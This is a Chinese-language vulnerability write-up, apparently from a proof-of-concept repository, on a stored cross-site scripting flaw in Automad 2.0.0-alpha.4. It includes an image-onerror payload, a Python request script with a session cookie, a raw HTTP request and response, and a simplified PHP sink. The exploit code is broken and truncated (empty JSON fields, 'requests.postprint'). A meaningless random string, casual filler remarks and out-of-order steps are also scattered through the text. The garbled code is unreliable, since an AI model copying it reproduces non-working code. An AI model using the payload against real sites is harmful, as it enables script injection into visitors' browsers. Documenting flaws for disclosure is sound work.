本项目为漏洞分析文档，无需安装额外软件。但若要复现漏洞，需满足以下环境要求：

咱得有个合适的环境，哈哈，你懂的。

使用Docker构建并运行：

docker build -t automad:2.0.0-alpha.4 .docker run -p 80:80 automad:2.0.0-alpha.4

访问 http://localhost 完成Automad的初始安装配置，并创建管理员账户。

说实话，这个步骤挺简单的，不就是安装个Automad嘛。

登录后台使用管理员账户登录，访问 http://localhost/dashboard/home。

这个步骤的关键在于，你得有个管理员账户，害，不难吧。

编辑首页在仪表盘中选择编辑默认的“Welcome”页面。

定位内容区块导航至 http://localhost/dashboard/page?url=%2F&section=text，编辑名为 Main 的区块。

注入XSS载荷在文本编辑区域输入以下载荷：<img src=x onerror=alert>

咱就是说这个载荷hen经典，你懂的。

// 恶意载荷const xssPayload = '<img src=x onerror=alert>';// 注入到页面内容的JSON结构中const maliciousData = { "data": { "+main": { "blocks": } }, "url": "/"};

import requests# 目标URL和Cookieurl = "http://localhost/_api/page/data"cookies = { "Automad-8c069df52082beee3c95ca17836fb8e2": "d6ef49301b4eb159fbcb392e5137f6cb"}# 构造multipart/form-data请求files = { "__csrf__": , "__json__": >"}}]},"url":"/"}}')}response = requests.postprint

// Automad中处理页面数据存储的简化逻辑$jsonInput = $_POST;$pageData = json_decode;// 未对用户输入的HTML内容进行充分的过滤或转义$content = $pageData;// 存储到文件或数据库savePageContent;// 前端渲染时直接输出，导致XSSecho $content;

6HFtX5dABrKlqXeO5PUv/2CeWfjxRzGcbKwZW03RE0axryGu0rTYkQimlZuBGv7l，这串字符kan起来挺神秘的，你说是不是？

保存并触发保存页面修改，随后访问首页 http://localhost/，浏览器将弹出 alert 对话框。

POST /_api/page/data HTTP/1.1Host: localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCvCookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb------WebKitFormBoundaryzHmXQBdtZsTYQYCvContent-Disposition: form-data; name="__json__"{"data":{"+main":{"blocks":}},"url":"/"}------WebKitFormBoundaryzHmXQBdtZsTYQYCv--

HTTP/1.1 200 OKContent-Type: application/json; charset=utf-8Content-Length: 43{"code":200,"time":1643723901}

访问首页 http://localhost/，若弹出 alert 对话框，则表示XSS漏洞成功触发。

git clone https://github.com/marcantondahmen/automad.gitcd automadgit checkout 2.0.0-alpha.4

这是一个针对 Automad 2.0.0-alpha.4 版本的内容管理系统的安全漏洞利用项目。 Automad 是一款基于文件的轻量级 CMS，而此项目揭示了该版本中存在的一个严重安全缺陷——存储型跨站脚本漏洞 。 攻击者可利用该漏洞向模板主体中注入恶意 JavaScript 代码，这些代码会永久存储在服务器上，并在任何访问受影响页面的用户浏览器中执行。